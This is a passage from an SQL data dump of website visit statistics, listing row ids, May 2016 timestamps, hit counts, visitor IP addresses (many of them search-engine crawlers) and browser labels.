75,1,1,0,0,'130.193.51.19','other'),(39133,1463179424,1,0,1,0,'66.249.65.107',''),(39134,1463179500,1,1,0,0,'141.8.142.61','other'),(39135,1463179625,1,1,0,0,'141.8.142.85','other'),(39136,1463179762,2,2,0,0,'130.193.50.6','other'),(39137,1463180031,1,1,0,0,'130.193.37.7','other'),(39138,1463181159,1,1,0,0,'130.193.50.34','other'),(39139,1463181169,1,1,0,0,'130.193.51.83','other'),(39140,1463181325,1,1,0,0,'66.249.65.118','chrome'),(39141,1463181418,1,1,0,0,'180.76.15.142','other'),(39142,1463182789,1,0,1,0,'66.249.65.121',''),(39143,1463184073,1,1,0,0,'52.3.105.23','other'),(39144,1463184870,2,2,0,0,'141.8.183.25','other'),(39145,1463184997,1,1,0,0,'141.8.132.105','other'),(39146,1463185371,1,1,0,0,'178.154.189.202','other'),(39147,1463185372,1,1,0,0,'5.255.253.113','other'),(39148,1463185617,1,1,0,0,'52.3.105.23','other'),(39149,1463188493,1,1,0,0,'141.8.183.25','other'),(39150,1463188624,1,1,0,0,'141.8.132.105','other'),(39151,1463188852,1,1,0,0,'52.3.127.144','other'),(39152,1463189338,1,1,0,0,'157.55.39.59','other'),(39153,1463191693,19,19,0,0,'212.83.177.193','other'),(39154,1463192095,1,1,0,0,'141.8.183.25','other'),(39155,1463192221,1,1,0,0,'5.255.253.113','other'),(39156,1463192970,1,1,0,0,'207.46.13.141','other'),(39157,1463193450,1,1,0,0,'141.0.14.14','other'),(39158,1463194129,1,1,0,0,'52.3.105.23','other'),(39159,1463195447,2,2,0,0,'141.8.132.105','other'),(39160,1463195573,1,1,0,0,'130.193.50.34','other'),(39161,1463195701,1,1,0,0,'178.154.149.11','other'),(39162,1463195830,1,1,0,0,'130.193.51.83','other'),(39163,1463196327,1,1,0,0,'207.46.13.141','other'),(39164,1463198800,1,1,0,0,'207.46.13.141','other'),(39165,1463199119,3,3,0,0,'188.40.95.70','other'),(39166,1463199168,1,1,0,0,'130.193.51.45','other'),(39167,1463200824,1,1,0,0,'94.179.117.193','chrome'),(39168,1463200982,1,1,0,0,'141.0.15.198','other'),(39169,1463201235,4,4,0,0,'92.236.71.145','other'),(39170,1463203005,3,3,0,0,'141.8.132.105','other'),(39171,1463203007,2,2,0,0,'5.255.253.113','other'),(39172,1463203134,1,1,0,0,'141.8.183.25','other'),(39173,1463203260,4,4,0,0,'130.193.50.34','other'),(39174,1463204024,1,1,0,0,'141.8.132.105','other'),(39175,1463205478,1,0,1,0,'66.249.65.107',''),(39176,1463206989,1,1,0,0,'141.8.183.25','other'),(39177,1463207125,1,1,0,0,'5.255.253.113','other'),(39178,1463207368,1,1,0,0,'141.8.132.105','other'),(39179,1463207505,1,1,0,0,'66.249.93.185','chrome'),(39180,1463207646,1,0,1,0,'68.180.229.171',''),(39181,1463210127,2,2,0,0,'130.193.51.83','other'),(39182,1463210253,1,1,0,0,'141.8.132.105','other'),(39183,1463210509,3,3,0,0,'141.8.183.25','other'),(39184,1463210767,1,1,0,0,'130.193.50.34','other'),(39185,1463210897,1,1,0,0,'5.255.253.113','other'),(39186,1463211496,1,1,0,0,'130.0.235.182','other'),(39187,1463211989,1,1,0,0,'66.249.65.104','chrome'),(39188,1463212037,1,1,0,0,'130.193.51.83','other'),(39189,1463212043,1,1,0,0,'141.8.183.25','other'),(39190,1463212900,1,1,0,0,'66.249.65.118','chrome'),(39191,1463213179,1,0,1,0,'66.249.65.107',''),(39192,1463213834,1,1,0,0,'66.249.65.107','chrome'),(39193,1463213937,1,1,0,0,'52.3.105.23','other'),(39195,1463213938,2,2,0,0,'141.8.183.25','other'),(39196,1463214033,1,1,0,0,'141.8.132.105','other'),(39197,1463214188,1,1,0,0,'66.249.65.121','chrome'),(39198,1463214481,1,1,0,0,'92.113.191.101','firefox'),(39199,1463214502,4,4,0,0,'130.193.50.34','other'),(39200,1463214710,1,1,0,0,'178.92.67.101','firefox'),(39201,1463214888,1,1,0,0,'141.8.183.25','other'),(39202,1463215147,2,2,0,0,'5.255.253.113','other'),(39203,1463215158,1,1,0,0,'66.249.65.124','chrome'),(39204,1463215403,1,1,0,0,'141.8.132.105','other'),(39205,1463215844,1,0,1,0,'66.249.65.104',''),(39206,1463216165,1,0,1,0,'66.249.65.121',''),(39207,1463217805,1,1,0,0,'178.154.149.11','other'),(39208,1463217810,1,1,0,0,'141.8.183.25','other'),(39209,1463217929,2,2,0,0,'130.193.50.34','other'),(39210,1463217934,1,1,0,0,'130.193.51.19','other'),(39211,1463217971,1,1,0,0,'195.225.173.190','other'),(39212,1463218498,1,1,0,0,'157.55.39.59','other'),(39213,1463218985,1,1,0,0,'66.249.65.124','chrome'),(39214,1463219061,1,1,0,0,'66.249.65.101','chrome'),(39215,1463220335,1,0,1,0,'66.249.65.107',''),(39216,1463220435,1,1,0,0,'66.249.65.124','chrome'),(39217,1463220844,1,1,0,0,'52.3.105.23','other'),(39218,1463220855,1,1,0,0,'66.249.65.107','chrome'),(39219,1463226275,2,2,0,0,'66.249.65.107','chrome'),(39220,1463226515,1,1,0,0,'92.113.191.101','firefox'),(39221,1463227094,1,1,0,0,'52.3.105.23','other'),(39222,1463230892,1,0,1,0,'66.249.65.121',''),(39223,1463230990,1,0,1,0,'66.249.65.101',''),(39224,1463232730,18,18,0,0,'157.55.39.63','other'),(39225,1463233433,17,17,0,0,'207.46.13.141','other'),(39226,1463233475,16,16,0,0,'157.55.39.59','other'),(39227,1463233940,15,15,0,0,'207.46.13.97','other'),(39228,1463235312,1,1,0,0,'66.249.65.104','chrome'),(39229,1463236236,1,1,0,0,'207.46.13.97','other'),(39230,1463236641,1,1,0,0,'52.3.105.23','other'),(39231,1463238855,1,1,0,0,'207.46.13.141','other'),(39232,1463238904,3,3,0,0,'188.187.188.153','other'),(39233,1463239098,1,1,0,0,'52.3.105.23','other'),(39234,1463239201,1,1,0,0,'130.193.50.34','other'),(39235,1463240767,1,1,0,0,'77.109.20.122','chrome'),(39236,1463240776,1,0,1,0,'66.249.65.101',''),(39237,1463240778,2,0,2,0,'66.249.65.104',''),(39238,1463240846,2,0,2,0,'66.249.65.121',''),(39239,1463241011,1,1,0,0,'37.9.122.202','other'),(39240,1463241585,1,1,0,0,'130.193.50.34','other'),(39241,1463242884,1,1,0,0,'141.8.183.25','other'),(39242,1463244386,4,4,0,0,'62.210.148.246','other'),(39243,1463244616,1,1,0,0,'180.76.15.33','other'),(39244,1463244966,1,1,0,0,'130.193.50.34','other'),(39245,1463245586,1,1,0,0,'77.109.20.122','chrome'),(39246,1463246425,1,1,0,0,'157.55.39.59','other'),(39247,1463247214,1,1,0,0,'52.3.105.23','other'),(39248,1463247275,1,1,0,0,'157.55.39.63','other'),(39249,1463247445,1,1,0,0,'130.193.50.34','other'),(39250,1463248487,1,1,0,0,'77.109.20.122','chrome'),(39251,1463251754,1,1,0,0,'92.113.191.101','firefox'),(39252,1463252074,1,1,0,0,'66.249.66.82','chrome'),(39253,1463253104,1,1,0,0,'52.3.105.23','other'),(39254,1463253458,1,1,0,0,'157.55.39.234','other'),(39255,1463257456,1,1,0,0,'141.8.183.25','other'),(39256,1463262907,1,1,0,0,'66.249.66.76','chrome'),(39257,1463262992,1,1,0,0,'141.8.183.25','other'),(39258,1463263356,1,1,0,0,'91.196.178.161','chrome'),(39259,1463264659,2,2,0,0,'141.8.132.105','other'),(39260,1463266631,1,1,0,0,'141.8.183.25','other'),(39261,1463267401,1,1,0,0,'141.8.132.105','other'),(39262,1463268513,1,1,0,0,'66.249.66.60','chrome'),(39263,1463268730,1,1,0,0,'130.193.50.34','other'),(39264,1463269535,1,1,0,0,'52.3.105.23','other'),(39265,1463273251,1,1,0,0,'5.255.253.113','other'),(39266,1463274718,44,44,0,0,'157.55.39.234','other'),(39267,1463274748,59,59,0,0,'157.55.39.63','other'),(39268,1463274793,57,57,0,0,'207.46.13.141','other'),(39269,1463274894,63,63,0,0,'157.55.39.59','other'),(39270,1463276299,1,1,0,0,'141.8.142.61','other'),(39271,1463276694,1,1,0,0,'5.255.253.113','other'),(39272,1463277630,1,1,0,0,'66.249.66.60','chrome'),(39273,1463278340,1,1,0,0,'5.255.253.113','other'),(39274,1463278526,1,1,0,0,'141.8.132.105','other'),(39275,1463278610,1,1,0,0,'141.8.183.25','other'),(39276,1463278640,1,1,0,0,'95.25.55.222','msie'),(39277,1463278966,1,1,0,0,'130.193.50.34','other'),(39278,1463279907,1,1,0,0,'130.193.50.34','other'),(39279,1463280578,1,1,0,0,'130.193.51.19','other'),(39280,1463280796,1,1,0,0,'5.255.253.113','other'),(39281,1463281326,1,1,0,0,'52.3.105.23','other'),(39282,1463281351,1,1,0,0,'141.8.183.25','other'),(39283,1463281418,1,1,0,0,'130.193.50.6','other'),(39284,1463282596,1,1,0,0,'95.27.64.116','opera'),(39285,1463282874,2,2,0,0,'130.193.50.34','other'),(39286,1463283797,1,1,0,0,'5.255.253.113','other'),(39287,1463286468,1,1,0,0,'66.249.66.76','chrome'),(39288,1463287313,2,2,0,0,'204.16.0.243','firefox'),(39289,1463287619,1,1,0,0,'141.8.132.105','other'),(39290,1463288286,1,1,0,0,'157.55.39.234','other'),(39291,1463290012,1,1,0,0,'141.8.142.58','other'),(39292,1463290137,1,1,0,0,'130.193.51.83','other'),(39293,1463290262,1,1,0,0,'130.193.50.34','other'),(39294,1463291742,1,1,0,0,'130.193.50.34','other'),(39295,1463293288,1,1,0,0,'178.94.222.65','chrome'),(39296,1463293998,1,1,0,0,'52.3.105.23','other'),(39297,1463294139,1,1,0,0,'141.8.183.25','other'),(39298,1463294266,1,1,0,0,'141.8.132.105','other'),(39299,1463294353,1,1,0,0,'157.55.39.234','other'),(39300,1463294538,1,1,0,0,'5.255.253.113','other'),(39301,1463294912,1,1,0,0,'66.249.93.189','chrome'),(39302,1463295907,1,1,0,0,'52.3.105.23','other'),(39303,1463295943,1,1,0,0,'130.193.51.83','other'),(39304,1463296309,1,1,0,0,'91.196.178.66','other'),(39305,1463297293,1,1,0,0,'141.8.132.105','other'),(39306,1463298030,1,1,0,0,'78.111.185.41','chrome'),(39307,1463298055,1,1,0,0,'207.46.13.141','other'),(39308,1463298730,1,1,0,0,'141.8.183.25','other'),(39309,1463298840,1,1,0,0,'157.55.39.234','other'),(39310,1463300581,1,1,0,0,'141.8.132.105','other'),(39311,1463301099,1,1,0,0,'37.55.57.145','firefox'),(39312,1463301912,1,1,0,0,'95.133.238.105','other'),(39313,1463302909,1,1,0,0,'130.193.50.34','other'),(39314,1463304239,1,1,0,0,'52.3.105.23','other'),(39315,1463304698,1,1,0,0,'66.249.83.184','chrome'),(39316,1463305200,1,1,0,0,'95.133.238.105','other'),(39317,1463305445,1,1,0,0,'37.53.225.6','chrome'),(39318,1463306305,1,1,0,0,'207.46.13.141','other'),(39319,1463307244,1,1,0,0,'130.193.50.34','other'),(39320,1463307556,1,1,0,0,'141.8.183.25','other'),(39321,1463308704,1,1,0,0,'130.193.51.83','other'),(39322,1463308757,2,2,0,0,'52.3.105.23','other'),(39323,1463309197,1,1,0,0,'178.92.8.61','chrome'),(39324,1463309256,1,1,0,0,'5.255.253.113','other'),(39325,1463311838,1,1,0,0,'40.77.167.68','other'),(39326,1463312002,1,1,0,0,'52.3.105.23','other'),(39327,1463313599,1,1,0,0,'141.8.132.101','other'),(39328,1463313725,1,1,0,0,'66.249.66.79','chrome'),(39329,1463314026,1,1,0,0,'141.8.183.25','other'),(39330,1463314902,1,1,0,0,'130.193.50.34','other'),(39331,1463315742,1,1,0,0,'66.249.66.82','chrome'),(39332,1463315951,1,1,0,0,'130.193.50.34','other'),(39333,1463317181,1,1,0,0,'66.249.66.76','chrome'),(39334,1463317529,1,1,0,0,'141.8.183.25','other'),(39335,1463318161,1,1,0,0,'52.3.105.23','other'),(39336,1463318320,1,1,0,0,'37.55.57.145','firefox'),(39337,1463319630,1,1,0,0,'91.196.178.65','chrome'),(39338,1463319740,1,1,0,0,'89.163.148.58','other'),(39339,1463320097,58,58,0,0,'5.9.63.149','other'),(39340,1463322787,1,1,0,0,'40.77.167.68','other'),(39341,1463323596,1,1,0,0,'5.255.253.113','other'),(39342,1463323713,2,2,0,0,'130.193.50.34','other'),(39343,1463324081,5,5,0,0,'144.76.7.107','other'),(39344,1463324189,1,1,0,0,'130.193.51.83','other'),(39345,1463327263,1,1,0,0,'157.55.39.63','other'),(39346,1463327496,1,1,0,0,'141.8.132.105','other'),(39347,1463328596,1,0,1,0,'66.249.64.244',''),(39348,1463328743,1,0,1,0,'66.249.64.118',''),(39349,1463330059,1,1,0,0,'37.55.57.145','firefox'),(39350,1463330223,1,1,0,0,'141.8.132.105','other'),(39351,1463331575,1,1,0,0,'52.3.105.23','other'),(39352,1463331623,1,1,0,0,'93.158.152.201','other'),(39353,1463332121,1,1,0,0,'157.55.39.234','other'),(39354,1463332349,1,1,0,0,'37.55.57.145','firefox'),(39355,1463332504,1,1,0,0,'31.13.102.103','other'),(39356,1463332515,1,1,0,0,'31.13.106.119','other'),(39357,1463332516,1,1,0,0,'31.13.112.120','other'),(39358,1463332642,1,1,0,0,'31.13.113.129','other'),(39359,1463332658,1,1,0,0,'31.13.102.125','other'),(39360,1463332659,1,1,0,0,'91.196.178.100','chrome'),(39361,1463332667,1,1,0,0,'31.13.98.113','other'),(39362,1463332668,1,1,0,0,'31.13.98.115','other'),(39363,1463332827,1,1,0,0,'52.3.105.23','other'),(39364,1463333378,1,1,0,0,'141.8.183.25','other'),(39365,1463333897,1,1,0,0,'37.73.202.164','other'),(39366,1463335885,1,1,0,0,'91.196.178.34','chrome'),(39367,1463336067,2,2,0,0,'37.55.57.145','firefox'),(39368,1463336435,1,1,0,0,'37.73.215.95','other'),(39369,1463336918,1,1,0,0,'82.145.218.219','other'),(39370,1463337066,1,1,0,0,'62.244.53.130','chrome'),(39371,1463337782,1,1,0,0,'91.196.178.100','chrome'),(39372,1463338567,3,3,0,0,'144.76.93.46','other'),(39373,1463338705,1,1,0,0,'37.55.57.145','firefox'),(39374,1463338887,1,1,0,0,'37.73.215.95','other'),(39375,1463339046,1,1,0,0,'178.154.189.202','other'),(39376,1463339051,1,1,0,0,'37.46.229.152','chrome'),(39377,1463339758,1,1,0,0,'5.255.253.68','other'),(39378,1463339936,1,1,0,0,'5.255.253.113','other'),(39379,1463340576,1,1,0,0,'178.154.189.203','other'),(39380,1463340990,1,1,0,0,'37.55.57.145','firefox'),(39381,1463341065,1,1,0,0,'178.94.172.11','chrome'),(39382,1463341269,1,1,0,0,'217.20.145.18','other'),(39383,1463341318,1,1,0,0,'94.100.184.101','msie'),(39384,1463341451,1,1,0,0,'91.196.178.68','chrome'),(39385,1463342729,1,1,0,0,'37.55.57.145','firefox'),(39386,1463343280,1,1,0,0,'141.8.132.105','other'),(39387,1463343412,4,4,0,0,'69.30.213.202','other'),(39388,1463343641,1,1,0,0,'157.55.39.234','other'),(39389,1463344248,1,1,0,0,'141.8.183.25','other'),(39390,1463344771,1,1,0,0,'141.8.132.105','other'),(39391,1463344975,1,1,0,0,'91.196.178.136','other'),(39392,1463345938,1,1,0,0,'178.154.189.202','other'),(39393,1463346406,1,1,0,0,'37.55.57.145','firefox'),(39394,1463347117,1,1,0,0,'141.8.142.58','other'),(39395,1463347264,1,1,0,0,'141.8.142.25','other'),(39396,1463347526,1,1,0,0,'91.196.178.33','firefox'),(39397,1463347799,1,1,0,0,'91.196.178.135','other'),(39398,1463348618,1,1,0,0,'91.196.178.167','chrome'),(39399,1463348670,1,1,0,0,'52.3.105.23','other'),(39400,1463349793,1,1,0,0,'52.3.105.23','other'),(39401,1463350626,1,1,0,0,'130.193.50.34','other'),(39402,1463350661,1,1,0,0,'78.27.190.80','chrome'),(39403,1463351500,1,1,0,0,'141.8.132.105','other'),(39404,1463351934,1,1,0,0,'130.193.50.34','other'),(39405,1463353355,1,1,0,0,'207.46.13.141','other'),(39406,1463353839,1,1,0,0,'157.55.39.234','other'),(39407,1463356229,1,1,0,0,'207.46.13.141','other'),(39408,1463356898,1,0,1,0,'66.249.64.249',''),(39409,1463357182,1,1,0,0,'180.76.15.135','other'),(39410,1463357436,1,0,1,0,'66.249.64.108',''),(39411,1463358384,1,1,0,0,'141.8.142.94','other'),(39412,1463358738,1,1,0,0,'5.3.152.66','opera'),(39415,1463358739,1,1,0,0,'188.32.238.235','chrome'),(39416,1463359885,1,1,0,0,'141.8.183.6','other'),(39417,1463359937,1,1,0,0,'52.3.105.23','other'),(39418,1463360086,1,1,0,0,'40.77.167.68','other'),(39419,1463360309,1,1,0,0,'5.228.46.224','msie'),(39420,1463360318,1,1,0,0,'157.55.39.234','other'),(39421,1463361045,1,0,1,0,'66.249.64.108',''),(39422,1463361138,1,0,1,0,'66.249.64.113',''),(39423,1463362974,203,203,0,0,'176.9.10.227','other'),(39424,1463364865,1,0,1,0,'66.249.64.113',''),(39425,1463364945,1,1,0,0,'93.158.152.20','other'),(39426,1463365402,1,1,0,0,'66.249.64.239','chrome'),(39427,1463367420,1,1,0,0,'93.158.152.20','other'),(39428,1463367789,1,1,0,0,'82.145.208.77','other'),(39429,1463369822,1,1,0,0,'141.8.183.6','other'),(39430,1463370045,1,1,0,0,'93.158.152.20','other'),(39431,1463370070,1,0,1,0,'66.249.64.249',''),(39432,1463373659,1,1,0,0,'157.55.39.234','other'),(39433,1463373905,1,1,0,0,'40.77.167.68','other'),(39434,1463374352,1,1,0,0,'93.158.152.20','other'),(39435,1463375471,1,1,0,0,'94.153.192.46','firefox'),(39436,1463376254,1,1,0,0,'141.8.183.6','other'),(39437,1463376559,1,1,0,0,'91.196.178.69','firefox'),(39438,1463376667,1,1,0,0,'40.77.167.68','other'),(39439,1463377098,1,1,0,0,'91.196.178.65','chrome'),(39440,1463377136,1,1,0,0,'207.241.226.233','other'),(39441,1463377263,1,1,0,0,'91.196.178.72','firefox'),(39442,1463377351,1,1,0,0,'91.196.178.70','firefox'),(39443,1463377657,1,1,0,0,'91.196.178.72','chrome'),(39444,1463378871,1,1,0,0,'94.179.37.134','chrome'),(39445,1463378974,1,1,0,0,'91.192.132.242','chrome'),(39446,1463378985,1,1,0,0,'93.158.152.20','other'),(39447,1463379165,1,1,0,0,'94.179.63.98','firefox'),(39448,1463379259,1,1,0,0,'66.249.64.118','chrome'),(39449,1463379317,2,2,0,0,'91.196.178.69','firefox'),(39450,1463379557,1,1,0,0,'157.55.39.63','other'),(39451,1463379660,1,1,0,0,'91.196.178.100','chrome'),(39452,1463379886,1,1,0,0,'91.196.178.69','chrome'),(39453,1463380450,1,1,0,0,'94.179.8.125','chrome'),(39454,1463380711,1,1,0,0,'66.249.93.185','chrome'),(39455,1463380837,1,1,0,0,'91.196.178.67','chrome'),(39456,1463381372,1,1,0,0,'82.145.218.188','other'),(39457,1463381506,1,0,1,0,'66.249.64.108',''),(39458,1463381701,3,3,0,0,'91.196.178.69','firefox'),(39459,1463381798,1,1,0,0,'37.55.251.69','chrome'),(39460,1463382560,1,1,0,0,'69.171.230.101','other'),(39461,1463382564,1,1,0,0,'173.252.122.121','other'),(39462,1463382565,1,1,0,0,'66.220.155.250','other'),(39463,1463383035,1,1,0,0,'157.55.39.234','other'),(39464,1463383462,1,1,0,0,'66.249.64.244','chrome'),(39465,1463383487,1,1,0,0,'91.196.178.67','chrome'),(39466,1463384250,1,1,0,0,'141.8.183.6','other'),(39467,1463384253,1,1,0,0,'52.3.105.23','other'),(39468,1463384444,1,1,0,0,'91.196.179.33','chrome'),(39469,1463384691,1,1,0,0,'5.255.253.56','other'),(39470,1463384787,1,1,0,0,'94.179.98.65','chrome'),(39471,1463384789,1,0,1,0,'66.249.64.239',''),(39472,1463385791,1,1,0,0,'91.196.178.67','chrome'),(39473,1463386344,1,1,0,0,'178.93.27.181','firefox'),(39474,1463386622,1,1,0,0,'94.179.98.65','chrome'),(39475,1463386756,1,1,0,0,'91.196.178.69','firefox'),(39476,1463387022,1,1,0,0,'91.124.239.184','chrome'),(39477,1463387249,1,1,0,0,'91.196.178.67','chrome'),(39478,1463387267,1,1,0,0,'141.8.142.24','other'),(39479,1463387298,1,1,0,0,'194.50.254.171','chrome'),(39480,1463387408,1,1,0,0,'46.201.174.49','firefox'),(39481,1463388044,1,1,0,0,'91.196.178.133','firefox'),(39482,1463388224,1,0,1,0,'66.249.64.118',''),(39483,1463389002,1,1,0,0,'93.158.152.20','other'),(39484,1463389345,1,1,0,0,'52.3.105.23','other'),(39485,1463389398,1,1,0,0,'94.179.20.214','firefox'),(39486,1463389521,1,1,0,0,'40.77.167.68','other'),(39487,1463389640,1,1,0,0,'141.8.183.6','other'),(39488,1463389758,1,1,0,0,'141.8.142.94','other'),(39489,1463390057,1,1,0,0,'91.196.178.167','chrome'),(39490,1463390145,1,1,0,0,'66.249.64.113','chrome'),(39491,1463390329,1,1,0,0,'52.3.105.23','other'),(39492,1463390452,1,1,0,0,'37.53.224.253','chrome'),(39493,1463391213,1,1,0,0,'91.196.178.100','chrome'),(39494,1463391323,1,1,0,0,'93.158.152.20','other'),(39495,1463391538,2,2,0,0,'37.53.224.253','chrome'),(39496,1463392126,1,0,1,0,'66.249.64.244',''),(39497,1463392269,1,1,0,0,'91.196.178.69','firefox'),(39498,1463392320,1,1,0,0,'141.8.142.94','other'),(39499,1463392771,1,1,0,0,'157.55.39.234','other'),(39500,1463392889,1,1,0,0,'40.77.167.68','other'),(39501,1463393700,1,1,0,0,'91.196.178.167','chrome'),(39502,1463394384,1,1,0,0,'37.53.224.253','chrome'),(39503,1463394828,1,1,0,0,'193.19.152.14','other'),(39504,1463395273,1,1,0,0,'91.196.177.40','chrome'),(39505,1463395852,1,1,0,0,'94.179.89.127','chrome'),(39506,1463395885,1,0,1,0,'66.249.64.249',''),(39507,1463395940,1,1,0,0,'85.115.62.180','other'),(39508,1463396988,1,1,0,0,'94.27.58.206','chrome'),(39509,1463397084,1,1,0,0,'157.55.39.234','other'),(39510,1463398459,1,1,0,0,'91.196.178.69','firefox'),(39511,1463398529,1,1,0,0,'207.46.13.141','other'),(39512,1463398866,1,1,0,0,'37.53.224.253','chrome'),(39513,1463399099,1,1,0,0,'94.179.37.134','chrome'),(39514,1463399730,1,1,0,0,'91.196.178.161','firefox'),(39515,1463399963,1,1,0,0,'37.53.224.253','chrome'),(39516,1463400698,1,1,0,0,'95.133.40.149','firefox'),(39517,1463400875,1,1,0,0,'94.179.98.65','chrome'),(39518,1463401049,1,1,0,0,'193.93.12.194','firefox'),(39519,1463401431,1,1,0,0,'91.196.178.70','chrome'),(39520,1463402389,1,1,0,0,'93.158.152.20','other'),(39521,1463402410,1,1,0,0,'157.55.39.234','other'),(39522,1463402822,1,1,0,0,'94.178.160.62','chrome'),(39523,1463402901,1,1,0,0,'94.179.98.65','firefox'),(39524,1463403420,1,1,0,0,'141.8.183.6','other'),(39525,1463403425,1,1,0,0,'95.134.176.197','chrome'),(39526,1463403516,1,1,0,0,'92.113.12.251','opera'),(39527,1463403878,1,1,0,0,'95.132.73.233','chrome'),(39528,1463404087,2,2,0,0,'82.207.49.62','chrome'),(39529,1463404281,1,1,0,0,'178.94.172.11','chrome'),(39530,1463404404,1,1,0,0,'130.180.219.208','chrome'),(39531,1463404539,1,1,0,0,'91.196.178.69','firefox'),(39532,1463404628,1,1,0,0,'91.124.62.248','chrome'),(39533,1463404796,1,0,1,0,'66.249.64.113',''),(39534,1463404810,1,0,1,0,'66.249.64.244',''),(39535,1463405080,1,1,0,0,'82.207.49.62','chrome'),(39536,1463405446,1,1,0,0,'194.247.42.96','firefox'),(39537,1463405732,1,1,0,0,'31.43.137.172','chrome'),(39538,1463405816,1,1,0,0,'46.211.154.227','other'),(39539,1463405827,1,1,0,0,'91.196.178.69','firefox'),(39540,1463405848,1,1,0,0,'194.37.248.11','other'),(39541,1463405892,1,1,0,0,'216.163.188.228','firefox'),(39542,1463406737,1,1,0,0,'91.196.178.69','firefox'),(39543,1463407746,1,1,0,0,'82.207.49.62','chrome'),(39544,1463409159,1,1,0,0,'141.0.14.127','other'),(39545,1463409380,1,1,0,0,'141.0.14.127','opera'),(39546,1463409456,1,1,0,0,'207.46.13.141','other'),(39547,1463409828,2,0,2,0,'66.249.64.108',''),(39548,1463410366,1,1,0,0,'93.158.152.20','other'),(39549,1463411728,1,1,0,0,'94.178.85.102','chrome'),(39550,1463412676,1,1,0,0,'37.55.58.241','chrome'),(39551,1463413056,1,1,0,0,'92.113.156.28','firefox'),(39552,1463413244,1,1,0,0,'91.196.178.100','chrome'),(39553,1463413395,1,1,0,0,'93.158.152.20','other'),(39554,1463415167,1,1,0,0,'52.3.105.23','other'),(39555,1463415400,1,1,0,0,'141.0.14.76','opera'),(39556,1463415617,1,1,0,0,'91.196.178.68','firefox'),(39557,1463415701,1,1,0,0,'109.227.99.54','chrome'),(39558,1463417015,1,1,0,0,'94.179.46.92','firefox'),(39559,1463417040,1,0,1,0,'66.249.78.143',''),(39560,1463417896,1,1,0,0,'91.196.178.68','firefox'),(39561,1463417932,1,1,0,0,'141.8.183.6','other'),(39562,1463418679,1,0,1,0,'66.249.78.171',''),(39563,1463419176,1,1,0,0,'91.196.178.69','chrome'),(39564,1463419813,2,2,0,0,'128.199.61.228','other'),(39565,1463419874,1,1,0,0,'94.179.23.151','firefox'),(39566,1463420454,1,0,1,0,'66.249.78.150',''),(39567,1463421455,1,1,0,0,'193.194.127.217','firefox'),(39568,1463421539,1,1,0,0,'128.69.181.113','firefox'),(39569,1463421733,46,46,0,0,'208.43.225.84','other'),(39570,1463421841,1,1,0,0,'157.55.39.63','other'),(39571,1463422409,1,1,0,0,'141.8.142.94','other'),(39572,1463422429,1,1,0,0,'188.32.233.46','chrome'),(39573,1463422464,1,1,0,0,'46.188.42.117','opera'),(39574,1463423050,1,1,0,0,'91.196.178.161','firefox'),(39575,1463423453,1,1,0,0,'141.0.15.30','opera'),(39576,1463423485,1,1,0,0,'92.113.156.28','firefox'),(39577,1463424080,32,32,0,0,'94.199.151.22','other'),(39578,1463424084,1,0,1,0,'66.249.69.180',''),(39579,1463426151,1,1,0,0,'157.55.39.234','other'),(39580,1463426230,1,1,0,0,'95.46.140.10','chrome'),(39581,1463426307,1,1,0,0,'91.196.178.36','chrome'),(39582,1463429419,1,1,0,0,'95.46.140.10','chrome'),(39583,1463437535,1,1,0,0,'37.9.122.203','other'),(39584,1463439818,1,1,0,0,'93.158.152.20','other'),(39585,1463439971,1,1,0,0,'157.55.39.63','other'),(39586,1463442264,1,1,0,0,'157.55.39.63','other'),(39587,1463442306,1,1,0,0,'130.193.50.34','other'),(39588,1463444805,1,1,0,0,'141.8.183.25','other'),(39589,1463444828,1,1,0,0,'93.158.152.20','other'),(39590,1463445418,1,1,0,0,'66.249.78.178','chrome'),(39591,1463445492,1,1,0,0,'157.55.39.234','other'),(39592,1463446095,1,1,0,0,'157.55.39.63','other'),(39593,1463447020,1,1,0,0,'52.3.105.23','other'),(39594,1463449126,1,1,0,0,'178.154.189.202','other'),(39595,1463449520,1,1,0,0,'93.158.152.20','other'),(39596,1463450290,1,1,0,0,'130.193.50.34','other'),(39597,1463450887,1,1,0,0,'157.55.39.63','other'),(39598,1463451537,1,1,0,0,'141.8.142.94','other'),(39599,1463452097,1,1,0,0,'157.55.39.135','other'),(39600,1463452839,1,1,0,0,'180.76.15.146','other'),(39601,1463453544,1,1,0,0,'130.193.50.34','other'),(39602,1463454182,1,1,0,0,'141.8.132.105','other'),(39603,1463456202,1,1,0,0,'141.0.14.153','other'),(39604,1463456438,1,1,0,0,'130.193.50.34','other'),(39605,1463457780,1,1,0,0,'66.249.78.143','chrome'),(39606,1463459754,1,1,0,0,'180.76.15.13','other'),(39607,1463460353,1,1,0,0,'5.255.253.113','other'),(39608,1463460751,1,1,0,0,'66.249.78.171','chrome'),(39609,1463460983,1,1,0,0,'207.46.13.141','other'),(39610,1463461211,1,1,0,0,'66.249.78.143','chrome'),(39611,1463461845,1,1,0,0,'130.193.50.34','other'),(39612,1463462605,1,1,0,0,'37.52.248.226','firefox'),(39613,1463463502,1,0,1,0,'66.249.78.143',''),(39614,1463463628,1,1,0,0,'66.249.93.187','chrome'),(39615,1463463956,1,1,0,0,'82.145.211.205','other'),(39616,1463464434,1,1,0,0,'91.196.178.71','firefox'),(39617,1463465224,1,1,0,0,'130.193.50.34','other'),(39618,1463466103,1,1,0,0,'37.52.17.176','msie'),(39619,1463466127,1,1,0,0,'130.193.50.34','other'),(39620,1463466360,1,1,0,0,'5.255.253.113','other'),(39621,1463466443,1,1,0,0,'92.113.45.52','chrome'),(39622,1463466873,1,1,0,0,'91.196.178.132','firefox'),(39623,1463466975,1,1,0,0,'91.196.178.71','chrome'),(39624,1463467201,1,1,0,0,'91.196.178.68','firefox'),(39625,1463467265,1,1,0,0,'141.8.132.105','other'),(39626,1463467287,1,1,0,0,'95.135.90.249','chrome'),(39627,1463467479,1,1,0,0,'91.196.178.167','chrome'),(39628,1463468051,1,1,0,0,'130.193.50.34','other'),(39629,1463468479,1,1,0,0,'82.145.223.56','chrome'),(39630,1463469325,1,1,0,0,'141.8.183.25','other'),(39631,1463469328,1,1,0,0,'130.193.50.34','other'),(39632,1463470062,1,1,0,0,'5.255.253.113','other'),(39633,1463470168,1,1,0,0,'91.196.178.69','firefox'),(39634,1463470342,1,1,0,0,'178.95.247.236','chrome'),(39635,1463470730,1,1,0,0,'130.193.50.34','other'),(39636,1463470979,1,1,0,0,'93.73.234.193','firefox'),(39637,1463471457,1,1,0,0,'91.196.178.69','firefox'),(39638,1463472285,2,2,0,0,'141.8.183.25','other'),(39639,1463472304,1,1,0,0,'46.200.149.8','opera'),(39640,1463472652,1,1,0,0,'92.113.139.9','chrome'),(39641,1463473126,1,1,0,0,'176.125.42.63','f